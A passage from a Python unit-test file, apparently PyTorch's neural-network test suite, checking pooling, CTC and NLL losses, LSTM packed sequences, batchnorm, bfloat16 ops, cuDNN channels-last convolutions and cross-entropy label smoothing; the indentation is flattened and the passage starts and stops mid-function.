def test_fractional_max_pool3d(self, device):
x = torch.randn(1, 2, 7, 7, 7, requires_grad=True, device=device)
samples = x.new(1, 2, 3).uniform_()
def func(x):
return F.fractional_max_pool3d(
x, (2, 2, 2), output_size=(3, 3, 3), _random_samples=samples)
self.assertEqual(func(x).shape, (1, 2, 3, 3, 3))
gradcheck(func, [x])
gradgradcheck(func, [x])
x = torch.randn(2, 7, 7, 7, requires_grad=True, device=device)
self.assertEqual(func(x).shape, (2, 3, 3, 3))
gradcheck(func, [x])
gradgradcheck(func, [x])
for kernel_size in [(), (1,), (1, 1)]:
with self.assertRaisesRegex(RuntimeError, "kernel_size must either"):
# Incorrect kernel_size
F.fractional_max_pool3d(x, kernel_size=kernel_size, output_size=(3, 3, 3), _random_samples=samples)
err_large_msg = "too large relative to input "
err_out_size_msg = "output_size must either"
for output_size, msg in [((9, 3, 3), err_large_msg + "time"),
((3, 9, 3), err_large_msg + "height"),
((3, 3, 9), err_large_msg + "width"),
((3, 3), err_out_size_msg),
((3,), err_out_size_msg),
((), err_out_size_msg)]:
with self.assertRaisesRegex(RuntimeError, msg):
# Incorrect output_size
F.fractional_max_pool3d(x, (2, 2, 2), output_size=output_size, _random_samples=samples)
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float)
@onlyOnCPUAndCUDA # TODO: Fails on XLA
def test_fractional_max_pool_nan_inf(self, device, dtype):
for num_dim in [2, 3]:
fn_name = 'FractionalMaxPool{}d'.format(num_dim)
fn = getattr(nn, fn_name)(kernel_size=2, output_size=1)
x = torch.full([1, 1] + num_dim * [3], nan, device=device, dtype=dtype, requires_grad=True)
res = fn(x)
res.backward(torch.randn_like(res))
self.assertTrue(math.isnan(res.item()))
x2 = torch.full([1, 1] + num_dim * [3], -inf, device=device, dtype=dtype, requires_grad=True)
res2 = fn(x2)
res2.backward(torch.randn_like(res2))
self.assertTrue(math.isinf(res2.item()))
@onlyOnCPUAndCUDA # TODO: RuntimeError message different on XLA
def test_pooling_zero_stride(self, device):
for op in ('max', 'avg'):
for num_dim in [1, 2, 3]:
fn_name = '{}_pool{}d'.format(op, num_dim)
fn = getattr(F, fn_name)
x = torch.ones([1, 2] + num_dim * [4], device=device, dtype=torch.float)
self.assertRaisesRegex(RuntimeError, r"stride should not be zero|stride must be greater than zero",
lambda: fn(x, kernel_size=2, stride=0))
fn_module_name = '{}Pool{}d'.format(op.title(), num_dim)
fn_module = getattr(nn, fn_module_name)(kernel_size=2, stride=0)
self.assertRaisesRegex(RuntimeError, r"stride should not be zero|stride must be greater than zero",
lambda: fn_module(x))
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_pool_large_size(self, device, dtype):
for op in ('max', 'avg'):
for num_dim in [1, 2, 3]:
fn_name = '{}_pool{}d'.format(op, num_dim)
fn = getattr(F, fn_name)
# 16777217 is the smallest integer not expressible in float32
x = torch.ones([1, 1, 16777217] + (num_dim - 1) * [1],
device=device, dtype=dtype)
res = fn(x, 1, stride=1, padding=0)
# check if the output shape was still computed correctly
self.assertEqual(x.shape[2], res.shape[2])
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_pool_invalid_size(self, device, dtype):
for op in ('max', 'avg'):
for num_dim in [1, 2, 3]:
fn_name = '{}_pool{}d'.format(op, num_dim)
if op == 'max':
# New implementation without indices supports empty tensors
# TODO(Heitor) change once with_indices code is updated
fn_name += '_with_indices'
fn = getattr(F, fn_name)
# use a configuration that gives zero outputs only
# when doing a correct floor division by the stride
x = torch.ones([1, 1] + num_dim * [4],
device=device, dtype=dtype)
with self.assertRaisesRegex(RuntimeError, r"too small|smaller than"):
try:
res = fn(x, 3, stride=2, padding=0, dilation=2)
except TypeError:
# some implementations do not support dilation
res = fn(x, 6, stride=2, padding=0)
def test_CTCLoss_empty_target(self, device):
target_lengths = [0, 0, 0]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (0,), dtype=torch.long, device=device)
log_probs = torch.randn(50, 3, 15, dtype=torch.double, device=device).log_softmax(2)
loss = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
self.assertTrue((loss >= 0).all().item())
self.assertEqual(-log_probs.sum(0)[:, 0], loss)
target_lengths = [0, 9, 0]
input_lengths = [50, 50, 50]
targets = torch.randint(1, 15, (9,), dtype=torch.long, device=device)
log_probs = torch.randn(50, 3, 15, dtype=torch.double, device=device).log_softmax(2)
loss = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
self.assertTrue((loss >= 0).all().item())
self.assertEqual(-log_probs.sum(0)[[0, 2], 0], loss[[0, 2]])
def test_empty_dropout(self, device):
x = torch.tensor([]).to(device)
out = torch.nn.functional.dropout(x)
self.assertEqual(out.size(), x.size())
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float)
@tf32_on_and_off(0.005)
def test_variable_sequence(self, device, dtype):
def pad(var, length):
if var.size(0) == length:
return var
return torch.cat([var, var.new_zeros(length - var.size(0), *var.size()[1:])])
def maybe_index_tuple(maybe_tuple_of_tensors, index):
if maybe_tuple_of_tensors is None:
return None
return tuple(maybe_tuple_of_tensors[j][:, index:index + 1, :].contiguous()
for j in range(2))
def check_lengths(lengths, enforce_sorted, use_default_hiddens, proj_size):
input_size = 3
hidden_size = 4
num_layers = 2
bidirectional = True
max_length = max(lengths)
x_leaf = torch.randn(max_length, len(lengths), input_size, device=device,
dtype=dtype, requires_grad=True)
num_directions = 2 if bidirectional else 1
lstm = nn.LSTM(input_size, hidden_size, bidirectional=bidirectional,
num_layers=num_layers, proj_size=proj_size).to(device, dtype)
lstm2 = deepcopy(lstm).to(device, dtype)
x = x_leaf
hidden0 = None
if not use_default_hiddens:
real_hidden_size = hidden_size if proj_size == 0 else proj_size
hidden0 = (torch.randn(num_directions * num_layers, len(lengths), real_hidden_size,
device=device, dtype=dtype),
torch.randn(num_directions * num_layers, len(lengths), hidden_size,
device=device, dtype=dtype))
# Compute sequences separately
seq_outs = []
seq_hiddens = []
for i, l in enumerate(lengths):
hidden_i = maybe_index_tuple(hidden0, i)
out, hid = lstm2(x[:l, i:i + 1], hidden_i)
out_pad = pad(out, max_length)
seq_outs.append(out_pad)
seq_hiddens.append(hid)
seq_out = torch.cat(seq_outs, 1)
seq_hidden = tuple(torch.cat(hids, 1) for hids in zip(*seq_hiddens))
# Use packed format
packed = rnn_utils.pack_padded_sequence(x, lengths, enforce_sorted=enforce_sorted)
packed_out, packed_hidden = lstm(packed, hidden0)
unpacked, unpacked_len = rnn_utils.pad_packed_sequence(packed_out)
# Check forward
prec = dtype2prec_DONTUSE[dtype]
self.assertEqual(packed_hidden, seq_hidden, atol=prec, rtol=0)
self.assertEqual(unpacked, seq_out, atol=prec, rtol=0)
self.assertEqual(unpacked_len, lengths, atol=prec, rtol=0)
# Check backward
seq_out.sum().backward()
grad_x = x_leaf.grad.data.clone()
x_leaf.grad.data.zero_()
unpacked.sum().backward()
self.assertEqual(x_leaf.grad, grad_x, atol=dtype2prec_DONTUSE[dtype], rtol=0)
for p1, p2 in zip(lstm.parameters(), lstm2.parameters()):
prec = dtype2prec_DONTUSE[dtype]
if dtype == torch.float16:
prec = 4e-2
self.assertEqual(p1.grad, p2.grad, atol=prec, rtol=0)
tests = [
# enforce_sorted, lengths
[True, [5]],
[False, [5]],
[True, [10, 10, 6, 2, 2, 1, 1]],
[False, [10, 10, 6, 2, 2, 1, 1]],
[False, [2, 1, 3, 2, 10, 5, 3]],
]
for enforce_sorted, seq_lens, in tests:
for use_default_hiddens in (True, False):
for proj_size in [0, 2]:
check_lengths(seq_lens, enforce_sorted, use_default_hiddens, proj_size)
def _test_batchnorm_update_stats(self, device, dtype=torch.float):
module = nn.BatchNorm1d(3).to(device, dtype)
data = torch.rand(4, 3, device=device, dtype=dtype)
# training pass
old_running_mean = module.running_mean.clone()
old_running_var = module.running_var.clone()
old_num_batches_tracked = module.num_batches_tracked.clone()
module(data)
self.assertNotEqual(old_running_mean, module.running_mean)
self.assertNotEqual(old_running_var, module.running_var)
self.assertEqual(old_num_batches_tracked + 1, module.num_batches_tracked)
# eval pass
module.eval()
old_running_mean = module.running_mean.clone()
old_running_var = module.running_var.clone()
old_num_batches_tracked = module.num_batches_tracked.clone()
module(data)
self.assertEqual(old_running_mean, module.running_mean)
self.assertEqual(old_running_var, module.running_var)
self.assertEqual(old_num_batches_tracked, module.num_batches_tracked)
def test_batchnorm_update_stats(self, device):
self._test_batchnorm_update_stats(device)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_update_stats(device)
def test_multi_margin_loss_errors(self, device):
self.assertRaises(RuntimeError,
lambda: nn.functional.multi_margin_loss(torch.randn(5, device=device),
torch.zeros(3, device=device)))
def _test_bfloat16_ops(self, op, device, inp_dims=(), prec=1e-2, scale_factor=None):
# fp32 compute
input1 = torch.randn(inp_dims, dtype=torch.float32, device=device, requires_grad=True)
if scale_factor is not None:
input1 = (torch.rand(inp_dims, dtype=torch.bfloat16, device=device) * scale_factor).float().requires_grad_()
out1 = op(input1)
grad_input1 = torch.randn_like(out1, device=device)
out1.backward(grad_input1)
# bfloat16 compute
op_bfp16 = op.bfloat16()
input2 = input1.detach().bfloat16().requires_grad_()
grad_input2 = grad_input1.bfloat16()
out2 = op_bfp16(input2)
out2.backward(grad_input2)
self.assertEqual(out1, out2, atol=prec, rtol=prec, exact_dtype=False)
self.assertEqual(input1.grad.data, input2.grad.data, atol=prec, rtol=prec, exact_dtype=False)
@onlyCUDA
def test_activations_bfloat16(self, device):
self._test_bfloat16_ops(torch.nn.ReLU(), device, inp_dims=(5), prec=1e-2)
self._test_bfloat16_ops(torch.nn.Threshold(0.1, 20), device, inp_dims=(5), prec=1e-2)
self._test_bfloat16_ops(torch.nn.ELU(), device, inp_dims=(5), prec=1e-2)
self._test_bfloat16_ops(torch.nn.Softplus(), device, inp_dims=(5), prec=1e-2)
self._test_bfloat16_ops(torch.nn.Hardshrink(), device, inp_dims=(5), prec=1e-2)
self._test_bfloat16_ops(torch.nn.Softshrink(), device, inp_dims=(5), prec=1e-2)
self._test_bfloat16_ops(torch.nn.LeakyReLU(), device, inp_dims=(5), prec=1e-2)
@onlyCUDA
def test_pooling_bfloat16(self, device):
self._test_bfloat16_ops(torch.nn.AvgPool1d(3, stride=2), device, inp_dims=(8, 4, 16), prec=0.05)
self._test_bfloat16_ops(torch.nn.AvgPool2d(3, stride=2), device, inp_dims=(8, 4, 16, 16), prec=0.05)
self._test_bfloat16_ops(torch.nn.AvgPool3d(3, stride=2), device, inp_dims=(8, 4, 16, 16, 16), prec=0.05)
self._test_bfloat16_ops(torch.nn.AdaptiveAvgPool1d(3), device, inp_dims=(8, 4, 16), prec=0.05)
self._test_bfloat16_ops(torch.nn.AdaptiveAvgPool2d((3, 5)), device, inp_dims=(8, 4, 16, 16), prec=0.05)
self._test_bfloat16_ops(torch.nn.AdaptiveAvgPool3d((3, 5, 7)), device, inp_dims=(8, 4, 16, 16, 16), prec=0.05)
@onlyOnCPUAndCUDA
def test_softmax_bfloat16(self, device):
for dim in [0, 1, 2, 3]:
self._test_bfloat16_ops(torch.nn.Softmax(dim=dim), device, inp_dims=(16, 33, 15, 16), prec=1e-2)
# test softmax with large input value which casues exp() to overflow
self._test_bfloat16_ops(torch.nn.Softmax(dim=dim), device, inp_dims=(16, 33, 15, 16), prec=0.05, scale_factor=1000.0)
@onlyCUDA
@skipCUDAIfRocmVersionLessThan((4, 3))
@skipCUDAIfNotMiopenSuggestNHWC
@skipCUDAIfCudnnVersionLessThan(7603)
@dtypes(torch.half, torch.float)
def test_conv_cudnn_nhwc(self, device, dtype):
def helper(n, c, h, w, out_channels, kernel_size, groups):
input = torch.randint(-3, 3, (n, c, h, w), dtype=dtype, device=device)\
.to(memory_format=torch.channels_last)
input.requires_grad_()
conv = nn.Conv2d(c, out_channels, kernel_size, groups=groups)\
.to(device='cuda', dtype=dtype, memory_format=torch.channels_last)
for p in conv.parameters():
p.data = torch.randint_like(p, -3, 3)
# use FP64 channels-first conv as reference
ref_input = input.detach().clone().contiguous().double().requires_grad_()
ref_conv = nn.Conv2d(c, out_channels, kernel_size, groups=groups)
# load_state_dict will restore the stride & memory_layout on ref_conv.weight.
ref_conv.load_state_dict(conv.state_dict())
ref_conv = ref_conv.to(device='cuda', dtype=torch.double, memory_format=torch.contiguous_format)
out = conv(input)
ref_out = ref_conv(ref_input)
grad = torch.randint_like(out, -3, 3)
ref_grad = grad.detach().clone().double().contiguous()
out.backward(grad)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(input.grad.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(conv.weight.grad.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertTrue(ref_input.grad.is_contiguous())
self.assertTrue(ref_conv.weight.grad.is_contiguous())
self.assertEqual(out, ref_out, exact_dtype=False)
self.assertEqual(conv.weight.grad, ref_conv.weight.grad, exact_dtype=False)
self.assertEqual(conv.bias.grad, ref_conv.bias.grad, exact_dtype=False)
self.assertEqual(input.grad, ref_input.grad, exact_dtype=False)
helper(2, 8, 4, 4, out_channels=4, kernel_size=3, groups=1)
helper(2, 8, 4, 4, out_channels=8, kernel_size=3, groups=8)
helper(1, 16, 56, 56, out_channels=16, kernel_size=3, groups=1)
helper(1, 16, 56, 56, out_channels=16, kernel_size=3, groups=16)
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(8005)
@dtypes(torch.half, torch.float)
def test_conv_cudnn_ndhwc(self, device, dtype):
def helper(n, c, d, h, w, out_channels, kernel_size, groups):
input = torch.randint(-2, 2, (n, c, d, h, w), dtype=dtype, device=device)\
.to(memory_format=torch.channels_last_3d)
input.requires_grad_()
conv = nn.Conv3d(c, out_channels, kernel_size, groups=groups)\
.to(device='cuda', dtype=dtype, memory_format=torch.channels_last_3d)
for p in conv.parameters():
p.data = torch.randint_like(p, -2, 2)
# use FP64 channels-first conv as reference
ref_input = input.detach().clone().contiguous().double().requires_grad_()
ref_conv = nn.Conv3d(c, out_channels, kernel_size, groups=groups)
# load_state_dict will restore the stride & memory_layout on ref_conv.weight.
ref_conv.load_state_dict(conv.state_dict())
ref_conv = ref_conv.to(device='cuda', dtype=torch.double, memory_format=torch.contiguous_format)
out = conv(input)
ref_out = ref_conv(ref_input)
grad = torch.randint_like(out, -2, 2)
ref_grad = grad.detach().clone().double().contiguous()
out.backward(grad)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last_3d))
self.assertTrue(input.grad.is_contiguous(memory_format=torch.channels_last_3d))
self.assertTrue(conv.weight.grad.is_contiguous(memory_format=torch.channels_last_3d))
self.assertTrue(ref_out.is_contiguous())
self.assertTrue(ref_input.grad.is_contiguous())
self.assertTrue(ref_conv.weight.grad.is_contiguous())
self.assertEqual(out, ref_out, exact_dtype=False)
self.assertEqual(conv.weight.grad, ref_conv.weight.grad, exact_dtype=False)
self.assertEqual(conv.bias.grad, ref_conv.bias.grad, exact_dtype=False)
self.assertEqual(input.grad, ref_input.grad, exact_dtype=False)
helper(2, 8, 4, 4, 4, out_channels=4, kernel_size=3, groups=1)
helper(2, 8, 4, 4, 4, out_channels=8, kernel_size=3, groups=8)
helper(1, 16, 18, 18, 18, out_channels=16, kernel_size=3, groups=1)
helper(1, 16, 18, 18, 18, out_channels=16, kernel_size=3, groups=16)
def _run_conv(self, layer, device, inp, grad, ref_conv, ref_input, ref_out,
input_format, weight_format, grad_format, output_format):
conv = layer(inp.size(1), grad.size(1),
ref_conv.weight.size(2)).float().to(device)
# load_state_dict will restore the stride & memory_layout on ref_conv.weight.
conv.load_state_dict(ref_conv.state_dict())
weight_data = conv.weight.detach().clone().contiguous(memory_format=weight_format)
conv.weight.data = weight_data.resize_(weight_data.size(), memory_format=weight_format)
input = inp.clone().contiguous(memory_format=input_format)
input.resize_(input.size(), memory_format=input_format)
input = input.requires_grad_()
grad = grad.contiguous(memory_format=grad_format)
grad.resize_(grad.size(), memory_format=grad_format)
out = conv(input)
out.backward(grad)
self.assertTrue(out.is_contiguous(memory_format=output_format))
self.assertEqual(out, ref_out)
self.assertEqual(conv.weight.grad, ref_conv.weight.grad)
self.assertEqual(conv.bias.grad, ref_conv.bias.grad)
self.assertEqual(input.grad, ref_input.grad)
def _test_conv_cudnn_nhwc_nchw(self, layer, n, c, h, w, k, filter_size, device):
data = torch.randint(1, 10, (n, c, h, w), dtype=torch.float32, device=device)
ref_input = data.clone().contiguous().requires_grad_(True)
ref_conv = layer(c, k, filter_size).float().to(device)
ref_out = ref_conv(ref_input)
grad = torch.randint(1, 10, ref_out.size(), dtype=torch.float32, device="cuda")
ref_out.backward(grad)
for w_f in [torch.contiguous_format, torch.channels_last]:
for g_f in [torch.contiguous_format, torch.channels_last]:
for input_format in [torch.contiguous_format, torch.channels_last]:
output_format = torch.contiguous_format
# Older versions of CudNN have Channels Last support disabled
if torch.backends.cudnn.version() >= 7603:
if input_format == torch.channels_last:
output_format = torch.channels_last
# This is because we have N111 weight that cannot handle
# the ambiguous memory_format
if w_f == torch.channels_last:
if layer == nn.Conv2d and filter_size * c != 1:
output_format = torch.channels_last
if layer == nn.ConvTranspose2d and filter_size * k != 1:
output_format = torch.channels_last
self._run_conv(layer, device, data, grad, ref_conv, ref_input,
ref_out, input_format, w_f, g_f, output_format)
@onlyCUDA
@skipCUDAIfRocmVersionLessThan((4, 3))
@skipCUDAIfNotMiopenSuggestNHWC
@skipCUDAIfCudnnVersionLessThan(7603)
@tf32_on_and_off(0.05)
def test_conv_cudnn_mismatch_memory_format(self, device):
configs = [
[4, 2, 8, 8, 4, 2],
[4, 1, 8, 8, 4, 2],
[1, 1, 8, 8, 4, 2],
[4, 2, 2, 8, 4, 1],
[4, 2, 1, 8, 4, 1],
[4, 2, 8, 8, 4, 1],
[4, 1, 8, 8, 4, 1],
]
for n, c, h, w, k, filter_size in configs:
self._test_conv_cudnn_nhwc_nchw(nn.Conv2d, n, c, h, w, k, filter_size, device)
self._test_conv_cudnn_nhwc_nchw(nn.ConvTranspose2d, n, c, h, w, k, filter_size, device)
# torch.half is erroring out on Windows with CUDA 10.1 + cuDNN 7.6.4
# returning CUDNN_STATUS_BAD_PARAM
# Disabling that specific test for now [see issue # 33918]
@onlyCUDA
@skipCUDAIfNoCudnn
@dtypes(torch.float, torch.double)
def test_conv_cudnn_nhwc_support(self, device, dtype):
input = torch.randn((1, 16, 1, 1), dtype=dtype, device="cuda", requires_grad=True)
weight = torch.randn((8, 16, 3, 3), dtype=dtype, device="cuda", requires_grad=True)
weight = weight.to(memory_format=torch.channels_last)
o = torch.conv2d(input, weight, None, (2, 1), (1, 1), (1, 1), 1)
self.assertTrue(o.is_contiguous(memory_format=torch.channels_last))
o.sum().backward()
# Test that faster algorithms used for inference produce the same results
# Validates depthwise3x3 bug reported in https://github.com/pytorch/pytorch/issues/60176
@onlyCPU
@dtypes(torch.float)
def test_conv2d_no_grad(self, device, dtype):
for batch in [1, 2, 3]:
for groups in [1, 2, 4]:
input = torch.rand(batch, groups, 8, 8, dtype=dtype, device=device)
m = nn.Conv2d(groups, 8, kernel_size=(3, 3), groups=groups, dtype=dtype, device=device)
with torch.no_grad():
output_ng = m(input)
output = m(input)
self.assertEqual(output, output_ng, rtol=1e-2, atol=1e-5)
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfNoCudnn
@dtypes(torch.float, torch.double, torch.float16)
def test_cudnn_convolution_relu(self, device, dtype):
for batch, groups, kernel_size, memory_format in product((1, 2, 3),
(1, 2, 4),
((1, 1), (3, 3)),
(torch.channels_last, torch.contiguous_format)):
inp = torch.rand(batch, groups, 8, 8, dtype=dtype, device=device)
w = torch.randn(8, groups, kernel_size[0], kernel_size[1], dtype=dtype, device=device)
conv2d_out = torch.conv2d(inp, w, None, (1, 1), (0, 0), (1, 1), 1)
inp = inp.to(memory_format=memory_format)
w = w.to(memory_format=memory_format)
cudnn_out = torch.cudnn_convolution_relu(inp, w, None, (1, 1), (0, 0), (1, 1), 1)
self.assertTrue(cudnn_out.is_contiguous(memory_format=memory_format))
self.assertEqual(conv2d_out.relu(), cudnn_out)
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7603)
def test_convert_conv2d_weight_memory_format(self, device):
input = torch.randint(1, 10, (2, 8, 4, 4), dtype=torch.float32, device=device)
model = nn.Sequential(
nn.Conv2d(8, 4, 3),
nn.BatchNorm2d(4)).to(device).float()
for memory_format in [torch.channels_last, torch.contiguous_format]:
model = nn.utils.convert_conv2d_weight_memory_format(model, memory_format)
out = model(input)
self.assertTrue(out.is_contiguous(memory_format=memory_format))
model = nn.Sequential(
nn.ConvTranspose2d(8, 4, 3),
nn.BatchNorm2d(4)).to(device).float()
for memory_format in [torch.channels_last, torch.contiguous_format]:
model = nn.utils.convert_conv2d_weight_memory_format(model, memory_format)
out = model(input)
self.assertTrue(out.is_contiguous(memory_format=memory_format))
def test_nll_loss_mismatched_batch(self, device):
x = torch.randn((10, 3), requires_grad=True, device=device)
# t should have size (10,)
t = torch.zeros((3,), dtype=torch.int64, device=device)
with self.assertRaisesRegex(ValueError, 'Expected.*batch_size'):
F.nll_loss(x, t)
def test_nll_loss_out_of_bounds_ignore_index(self, device):
x = torch.randn(6, 3, requires_grad=True, device=device)
t = torch.tensor([0, 1, 255, 0, 1, 2], dtype=torch.int64, device=device)
for reduction in ['mean', 'none']:
F.nll_loss(x, t, ignore_index=255, reduction=reduction).sum().backward()
def test_nll_loss_invalid_target_dim(self, device):
x = torch.randn((10, 3), device=device)
t = torch.zeros((10, 2), dtype=torch.int64, device=device)
with self.assertRaisesRegex(RuntimeError, "1D target tensor expected"):
F.nll_loss(x, t)
def test_nll_loss_invalid_weights(self, device):
x = torch.randn((10, 3), device=device)
t = torch.empty(10, dtype=torch.int64, device=device).random_(0, 3)
invalid_weights = [
torch.randn(4, device=device),
torch.randn(1, 3, device=device),
]
msg = "weight tensor should be defined either for all 3 classes or no classes"
for weight in invalid_weights:
with self.assertRaisesRegex(RuntimeError, msg):
F.nll_loss(x, t, weight=weight)
def _nll_loss_helper(self, input_size, reduction, expected, device):
input = torch.rand(input_size, requires_grad=True, device=device)
num_channels = input_size[1]
target_size = (input_size[0], ) + tuple(input_size[2:])
target = torch.randint(num_channels, target_size, device=device)
output = F.nll_loss(input, target, reduction=reduction)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, expected)
output.sum().backward()
self.assertEqual(input.grad.size(), input.size())
def test_nll_loss_empty_tensor_reduction_none(self, device):
self._nll_loss_helper([0, 3], "none", torch.empty([0], device=device), device)
self._nll_loss_helper([0, 3, 5, 7], "none", torch.empty([0, 5, 7], device=device), device)
self._nll_loss_helper([2, 3, 0, 7], "none", torch.empty([2, 0, 7], device=device), device)
self._nll_loss_helper([2, 3, 5, 0], "none", torch.empty([2, 5, 0], device=device), device)
self._nll_loss_helper([2, 3, 5, 7, 0], "none", torch.empty([2, 5, 7, 0], device=device), device)
@unittest.skipIf(TEST_WITH_UBSAN, "division-by-zero error with UBSAN")
def test_nll_loss_empty_tensor_reduction_mean(self, device):
nan = torch.tensor(float('nan'), device=device)
self._nll_loss_helper([0, 3], "mean", nan, device)
self._nll_loss_helper([0, 3, 5, 7], "mean", nan, device)
self._nll_loss_helper([2, 3, 0, 7], "mean", nan, device)
self._nll_loss_helper([2, 3, 5, 0], "mean", nan, device)
self._nll_loss_helper([2, 3, 5, 7, 0], "mean", nan, device)
def test_nll_loss_empty_tensor_reduction_sum(self, device):
zero = torch.tensor(0, device=device)
self._nll_loss_helper([0, 3], "sum", zero, device)
self._nll_loss_helper([0, 3, 5, 7], "sum", zero, device)
self._nll_loss_helper([2, 3, 0, 7], "sum", zero, device)
self._nll_loss_helper([2, 3, 5, 0], "sum", zero, device)
self._nll_loss_helper([2, 3, 5, 7, 0], "sum", zero, device)
def test_nll_loss_total_weight_is_zero(self, device):
def helper(input_size):
input = torch.ones(input_size, requires_grad=True, device=device)
num_channels = input_size[1]
target_size = (input_size[0], ) + tuple(input_size[2:])
target = torch.zeros(target_size, dtype=torch.long, device=device)
weight = torch.zeros([num_channels], device=device)
self.assertEqual(F.nll_loss(input, target, weight).item(), 0)
helper([2, 3])
helper([2, 3, 5, 7])
helper([2, 3, 5, 7, 9])
def test_nll_loss_byte_target_matches_long(self, device):
N, C = 10, 4
input = torch.randn(N, C, device=device, requires_grad=True)
target = torch.empty(N, dtype=torch.long, device=device).random_(0, C)
def compute_result_and_gradient(reduction, target_dtype):
input_ = input.detach()
input_.requires_grad_()
prob = F.log_softmax(input_, dim=-1)
loss = nn.NLLLoss(reduction=reduction)
result = loss(prob, target.to(target_dtype))
result.sum().backward()
return result, input_.grad
for reduction in ["none", "mean", "sum"]:
result_long, grad_long = compute_result_and_gradient(reduction, torch.long)
result_byte, grad_byte = compute_result_and_gradient(reduction, torch.uint8)
self.assertEqual(result_long, result_byte)
self.assertEqual(grad_long, grad_byte)
def test_cross_entropy_loss_prob_target_all_reductions(self, device):
# Test with k-dimensional loss.
for k in range(5):
N, C = 5, 4
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
weight = torch.randn(C, device=device).abs()
for reduction, w in product(['none', 'mean', 'sum'], [None, weight]):
m = torch.nn.CrossEntropyLoss(weight=w, reduction=reduction)
output = m(input, target)
output_ref = loss_reference_fns['CrossEntropyLoss'](
input, target, reduction=reduction, weight=w)
self.assertEqual(output, output_ref)
def test_cross_entropy_loss_prob_target_unit_weights(self, device):
# Test with k-dimensional loss.
for k in range(5):
N, C = 5, 4
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
for reduction in ['none', 'mean', 'sum']:
# Ensure result with unit weights is equivalent to result without weights.
m = torch.nn.CrossEntropyLoss(reduction=reduction)
unit_weight = torch.ones(C, device=device, dtype=target.dtype)
m_unit = torch.nn.CrossEntropyLoss(weight=unit_weight, reduction=reduction)
output = m(input, target)
output_unit = m_unit(input, target)
self.assertEqual(output, output_unit)
def test_cross_entropy_loss_index_target_unit_weights(self, device):
# Test with k-dimensional loss.
for k in range(5):
N, C = 5, 4
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = torch.empty(N, *other_dims, dtype=torch.long, device=device).random_(0, C)
for reduction in ['none', 'mean', 'sum']:
# Ensure result with unit weights is equivalent to result without weights.
m = torch.nn.CrossEntropyLoss(reduction=reduction)
unit_weight = torch.ones(C, device=device, dtype=input.dtype)
m_unit = torch.nn.CrossEntropyLoss(weight=unit_weight, reduction=reduction)
output = m(input, target)
output_unit = m_unit(input, target)
self.assertEqual(output, output_unit)
def test_cross_entropy_loss_one_hot_target(self, device):
# Test with k-dimensional loss.
for k in range(5):
N, C = 5, 4
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = torch.empty(N, *other_dims, dtype=torch.long, device=device).random_(0, C)
weight = torch.randn(C, device=device).abs()
# Get one-hot representation of the target.
target_one_hot = F.one_hot(target, num_classes=C).to(input.dtype)
# Need to put the C dim at index 1.
target_one_hot = target_one_hot.permute(0, -1, *range(1, target_one_hot.dim() - 1))
for reduction, w in product(['none', 'mean', 'sum'], [None, weight]):
# Skip this case for now because soft and hard label CE are not consistent
# in the way they apply class weights (see issue #61309).
if reduction == 'mean' and weight is not None:
continue
# Ensure loss computed with class indices matches loss
# computed with one-hot class probs.
m = torch.nn.CrossEntropyLoss(weight=w, reduction=reduction)
output = m(input, target)
output_one_hot = m(input, target_one_hot)
self.assertEqual(output, output_one_hot)
def test_cross_entropy_label_smoothing_errors(self, device):
N, C = 3, 4
input_args = [
(torch.randn((N, C), device=device), torch.arange(0, C, device=device)),
(torch.randn((N, C), device=device), torch.randn(N, C, device=device))
]
for input_arg in input_args:
loss = nn.CrossEntropyLoss(label_smoothing=1.2)
with self.assertRaisesRegex(RuntimeError,
r"label_smoothing must be between 0\.0"):
loss(*input_arg)
def test_cross_entropy_label_smoothing_consistent_index_target_and_probs(self, device):
N, C = 10, 4
ks = range(5)
reductions = ['none', 'mean', 'sum']
label_smoothings = [0.05, 0.15]
for k, reduction, label_smoothing in product(ks, reductions, label_smoothings):
other_dims = [torch.randint(2, 5, size=(1,)).item() for _ in range(k)]
input = torch.randn(N, C, *other_dims, device=device, requires_grad=True)
target = torch.empty(N, *other_dims, dtype=torch.long, device=device).random_(0, C)
# construct target probablity that should have the same result as label_smoothing
target_proba = F.one_hot(target, num_classes=C)
# Need to put the C dim at index 1.
target_proba = target_proba.permute(0, -1, *range(1, target_proba.dim() - 1))
target_mask = (target_proba == 1)
target_proba = target_proba.to(dtype=input.dtype)
# y_k^ls = y_k * (1 - label_smoothing) + label_smoothing / n_classes
# Get one-hot representation of the target.
target_proba.masked_fill_(target_mask, 1 - label_smoothing + label_smoothing / C)
target_proba.masked_fill_(~target_mask, label_smoothing / C)
loss = nn.CrossEntropyLoss(reduction=reduction)
output_with_prob = loss(input, target_proba)
loss = nn.CrossEntropyLoss(
reduction=reduction, label_smoothing=label_smoothing)
output_with_index = loss(input, target)
